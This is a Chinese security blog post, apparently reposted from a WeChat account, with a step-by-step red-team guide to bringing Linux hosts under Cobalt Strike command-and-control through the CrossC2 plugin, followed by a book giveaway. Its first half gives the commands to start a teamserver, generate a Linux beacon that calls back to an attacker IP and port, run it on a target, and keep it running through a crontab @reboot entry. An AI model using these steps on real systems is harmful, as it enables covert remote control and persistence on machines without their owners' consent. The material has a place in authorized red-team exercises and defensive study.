CobaltStrike上线Linux【文末赠书】

admin 2022年8月5日13:43:31安全文章评论19 views2155字阅读7分11秒阅读模式

在红蓝对抗中,我们常需要对目标进行长时间的控制,cobaltstrike原生对于上线windows比较轻松友好,但如果是Linux平台就需要用到第三方插件了。


准备工作


这里使用CrossC2的插件,类似于在linux上反弹一个cobaltstrike类的shell。


github:https://github.com/gloxec/CrossC2


下载时注意自己的cs版本(我这里使用的是3.0.2的最新版插件,cs版本为4.3)


需要下载以下两个文件:


CrossC2***.cna、genCrossC2.Linux


由于我的木马是在linux平台生成的,因此使用genCrossC2.Linux,可根据自己平台的差异自行选择


服务端部署


cobaltstrike服务端部署

chmod +x teamserver./teamserver [ip] 
		
输入密码查看隐藏内容:

CobaltStrike上线Linux【文末赠书】


客户端连接

CobaltStrike上线Linux【文末赠书】

建立一个监听器,需要注意的是crossc2插件只支持https的beacon

CobaltStrike上线Linux【文末赠书】

安装crossc2

CobaltStrike上线Linux【文末赠书】

生成木马


我这里是在服务端的cobaltstrike目录直接生成的,如果在非服务端生成需要将服务端根目录的隐藏文件.cobaltstrike.beacon_keys复制下来放到cs根目录

chmod +x genCrossC2.Linux./genCrossC2.Linux [ip] [port] ./.cobaltstrike.beacon_keys null Linux x64 /tmp/test

CobaltStrike上线Linux【文末赠书】

上线


在目标靶机上直接运行就可以看到上线了.

chmod +x test./test

CobaltStrike上线Linux【文末赠书】

权限维持


一个简单的思想就是将其添加的系统启动项

有很多种方法,这里讲个最简单的,通过计划任务的方式实现

crontab -e@reboot /tmp/test

这样每次重启之后都能重新执行

这里需要注意的是要设置以下次登录的用户的crontab

作者:xzajyjs原文链接:https://blog.csdn.net/qq_35664104

赠书福利

CobaltStrike上线Linux【文末赠书】

一:Kerberos域网络安全从入门到精通


CobaltStrike上线Linux【文末赠书】

1.详细分析kerberos域网络安全漏洞,有针对性介绍攻防对抗方,维护kerberos域网络安全,保证企业网络安全稳定运行。Kerberos域网络作为承载企业资源和个人资源的基础网络,一旦失陷后果 严重。解决域网络安全问题是攻防从业人员必须解决的难题,本书详细介绍所有域网络相关漏洞,并给出攻防对抗方法,让安全从业人员“知己知彼,百战百胜”。2. 首本成体系的kerberos域网络安全教程,填补域网络安全书籍空白。域网络安全 重要,但是市场上关于域网络安全的图书都是国外引进,并不 适应我国企业需求,本书则从 企业的实际需求出发,介绍符合实际的攻防对抗方案, 有参考价值。3.原理介绍 + 案例分析 + 实验演示,增强了本书的可读性与实践指导性,读者能轻松、系统地掌握 Kerberos 域网络安全的相关内容,为我国 Kerberos 域网络的安全建设工作添砖加瓦。

二:人工智能技术基础

《人工智能技术基础》按照人工智能在不同领域的研究特点,通过专项应用来研究相关技术。
  全书分为11章,第1章介绍人工智能领域的基本概念,第2章说明Python语言编程工具的使用,第3章到第10章分别从应答机器人、物体识别、人脸识别、语音识别、视频识别、生成对抗神经网络、无人驾驶、区块链和大数据等方面对人工智能从原理到实战一步一步进行介绍,第11章提取了部分人工智能方面的面试题,供未来从事人工智能研究工作的读者参考。
  无论读者是否从事计算机相关专业的工作,有没有过开发的经验,是否熟悉Python语言,是否想要转行从事相关的工作,均可通过《人工智能技术基础》掌握编程的技巧和Python的基本技能。

三:人工智能原理与实践

人工智能被广泛应用和普及,极大地提高了人们学习和工作的效率。而要深入理解人工智能,必须全面理解底层各类机器学习算法的基本原理。只有全面掌握机器学习的基础知识,才能更好地理解、提高和驾驭人工智能的各种应用。
本书分为13章,前7章为原理篇,重点讨论了机器学习模型建模的全部流程、各类常用的机器学习算法原理、深度学习和强化学习、机器学习涉及的最优化原理,以及自然语言处理算法原理;后 6章为实践篇,重点讨论了信用卡客户细分、保险公司时间序列生活事件预测、电商网站交易欺诈预测、信用卡和信用贷款风险预测、美国旧金山房屋成交价格预测,以及股票短期回报率预测等多个实际应用场景。
 
赠书规则

     为了感谢大家一直以来的关注与支持,会有书籍免费赠送CobaltStrike上线Linux【文末赠书】

     规则如下:

     1.  本文末点‘在看’,不需要转发朋友圈,点个‘在看’就可以。

     2. 私聊文末公众号发送“0805”即可扫描参与抽奖,注意看是发送暗号“0805”

     3. 中奖者不满足条件1,视为放弃中奖资格。

     4. 活动截止时间08月05日 17:00点,到时候还要中奖者及时联系号主发送你的中奖核验二维码、收货地址、姓名、手机号以及想要的书籍,好给您发送书籍哦!24小时内未联系号主视为自动放弃!骗书行为出版社会永久拉黑!


先点“再看”,然后点击下方公众号私聊发送“0805” 即可马上扫描参与抽奖CobaltStrike上线Linux【文末赠书】

原文始发于微信公众号(LemonSec):CobaltStrike上线Linux【文末赠书】

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月5日13:43:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  CobaltStrike上线Linux【文末赠书】 http://cn-sec.com/archives/1223453.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: